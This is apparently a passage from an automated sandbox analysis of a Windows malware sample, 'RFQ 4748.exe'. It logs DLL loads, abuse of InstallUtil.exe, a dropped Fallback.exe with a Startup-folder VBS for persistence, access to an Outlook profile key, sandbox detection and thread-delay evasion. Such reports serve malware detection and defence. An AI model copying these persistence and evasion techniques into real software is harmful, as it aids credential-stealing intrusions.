                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: secur32.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: schannel.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Users\user\Desktop\RFQ 4748.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: RFQ 4748.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: RFQ 4748.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ 4748.exe, 00000000.00000002.2089151863.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003E38000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2105699680.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003685000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ 4748.exe, RFQ 4748.exe, 00000000.00000002.2089151863.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003E38000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2105699680.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003685000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

                  Source: RFQ 4748.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: Fallback.exe.0.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.6b60000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2105383235.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2089151863.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_058557B5 push E8FFFFFFh; retf 0_2_058557BA
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AA6A70 push es; ret 0_2_06AA6A80
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AA3253 push ss; retf 0_2_06AA3257
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AD7048 push es; ret 0_2_06AD7054
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AE9CEA push es; retf 0_2_06AE9CCC
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AE9C49 push es; retf 0_2_06AE9CCC
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AE9D66 push es; ret 0_2_06AE9D9C
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C55ED5 push es; iretd 0_2_06C55F18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06603181 push ebx; retf 2_2_06603182
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_0157D664 push eax; iretd 5_2_0157D682
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D114ED pushad ; iretd 5_2_06D114EE
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D10C55 push esp; iretd 5_2_06D10C56
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D11913 push eax; ret 5_2_06D1191D
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D63253 push ss; retf 5_2_06D63257
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D66A70 push es; ret 5_2_06D66A80
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D9230D push es; ret 5_2_06D92318
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DAAEB0 push eax; iretd 5_2_06DAAEBE
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DA34B3 push es; iretd 5_2_06DA34B6
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DA5431 push ebp; iretd 5_2_06DA543E
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DAC540 push eax; iretd 5_2_06DAC54E
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DACD0A push ecx; iretd 5_2_06DACD16
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F15ED5 push es; iretd 5_2_06F15F18
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F15F29 push es; iretd 5_2_06F15F58
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F15A8A push es; ret 5_2_06F15A8C
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F15B6D push es; ret 5_2_06F15B88
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F159EE push es; iretd 5_2_06F159F0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_07228379 push esp; iretd 5_2_0722837A
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_072297A9 push esp; iretd 5_2_072297AA
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_07227FD1 push ecx; iretd 5_2_07227FD2
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_07229A04 push esp; iretd 5_2_07229A05
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_07225A46 push esp; iretd 5_2_07225A47
                  Source: C:\Users\user\Desktop\RFQ 4748.exe | File created: C:\Users\user\AppData\Roaming\Fallback.exe (dropped file)

                  Boot Survival

                  Source: C:\Users\user\Desktop\RFQ 4748.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs (dropped file)
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR
                  Source: RFQ 4748.exe, 00000000.00000002.2089151863.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\RFQ 4748.exe Memory allocated: 12D0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\RFQ 4748.exe Memory allocated: 2E30000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\RFQ 4748.exe Memory allocated: 1410000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 29F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2BB0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4BB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Memory allocated: 1570000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Memory allocated: 32C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Memory allocated: 3020000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: EC0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2910000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4910000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\RFQ 4748.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599874
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599765
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599546
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598451
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597906
